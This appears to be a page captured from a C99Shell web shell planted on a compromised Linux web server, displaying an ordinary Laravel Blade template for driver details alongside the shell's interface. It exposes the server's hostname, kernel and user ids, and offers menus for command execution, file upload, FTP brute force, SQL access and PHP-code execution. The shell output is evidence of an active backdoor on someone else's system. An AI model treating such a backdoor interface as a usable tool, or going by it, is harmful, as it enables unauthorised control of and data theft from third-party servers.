!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/resources/views/driver/   drwxr-xr-x
Free 29.17 GB of 117.98 GB (24.73%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     details.blade.php (5.15 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.admin')
@section('page-title')
    {{__('Driver Details')}}
@endsection
@push('script-page')

@endpush
@section('breadcrumb')
    <li class="breadcrumb-item"><a href="{{route('dashboard')}}">{{__('Dashboard')}}</a></li>
    <li class="breadcrumb-item">{{__('Driver Details')}}</li>
@endsection
@section('action-btn')

@endsection

@section('content')

@php
    $profile=\App\Models\Utility::get_file('uploads/avatar/');
@endphp


    <div class="row">
        <div class="col-xl-12">
            <div class="card">
                <div class="card-header">
                    <h4 class="mb-0 text-center">{{__('Driver Details')}}</h4>
                </div>
                <div class="card-body">
                        @if(isset($driver) && $driver)
                        <div class="customer-order-details-sec">

                            <div class="driver-name">
                                {{__('Name : ')}} {{ isset($driver->name) ? $driver->name : '' }}
                               </div>
                               <div class="driver-email">
                                {{__('Email : ')}} {{ isset($driver->email) ? $driver->email : '' }}
                               </div>
                               <div class="driver-phone">
                                {{__('Phone Number : ')}} {{ isset($driver->phone_number) ? $driver->phone_number : '' }}
                               </div>
                               <div class="driver-language">
                                {{__('Driver Language : ')}} {{ isset($driver->driver_language) ? $driver->driver_language : '' }}
                              </div>
                              <div class="driver-status">
                                @if(isset($driver->driver_status) && $driver->driver_status == 'inactive')
                                {{__('Driver Status : ')}} <span class="badge badge-danger ">Off Duty</span>
                                @else
                                {{__('Driver Status : ')}} <span class="badge badge-success">On Duty</span>
                                @endif
                              </div>
                              @if($driver->current_location)
                              <div class="driver-language">
                                {{__('Current Location: ')}} <a href="https://maps.google.com/maps?z=12&t=m&q=loc:{{str_replace(',','+',$driver->current_location)}}" target="_blank">{{ $driver->current_location}}</a>
                              </div>
                              @endif


                            <div class="customer-name">
                                {{__('License info')}} : {{ isset($driver->license_info) ? $driver->license_info : '' }}
                            </div>

                            <div class="customer-name">
                                {{__('Insurance info')}} : {{ isset($driver->insurance_info) ? $driver->insurance_info : '' }}
                            </div>


                            <div class="customer-order-info-sec">
                                License Info File :
                                @if (isset($driver->license_info_file) && $driver->license_info_file)
                                    <img src="{{ ($driver->license_info_file) ? $profile  . $driver->license_info_file :'' }}" class="driver-img" alt="">

                                    <a href="{{route('driver.details.download',['file'=>$driver->license_info_file])}}">
                                        Download
                                    </a>

                                @endif
                            </div>

                            <div class="customer-order-info-sec">
                                Insurance Info File :
                                @if (isset($driver->insurance_info_file) && $driver->insurance_info_file)
                                    <img src="{{ ($driver->insurance_info_file) ? $profile  . $driver->insurance_info_file :'' }}" class="driver-img" alt="">

                                    <a href="{{route('driver.details.download',['file'=>$driver->insurance_info_file])}}">
                                        Download
                                    </a>
                                @endif
                            </div>

                            <div class="customer-order-info-sec">
                                Record Info File :
                                @if (isset($driver->driver_record_file) && $driver->driver_record_file)
                                    <img src="{{ ($driver->driver_record_file) ? $profile  . $driver->driver_record_file :'' }}" class="driver-img" alt="">

                                    <a href="{{route('driver.details.download',['file'=>$driver->driver_record_file])}}">
                                        Download
                                    </a>

                                @endif
                            </div>



                       </div>
                       @else
                       No Data Available
                        @endif

                </div>
            </div>
        </div>
    </div>
@endsection
 @section('extra-scripts')


@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--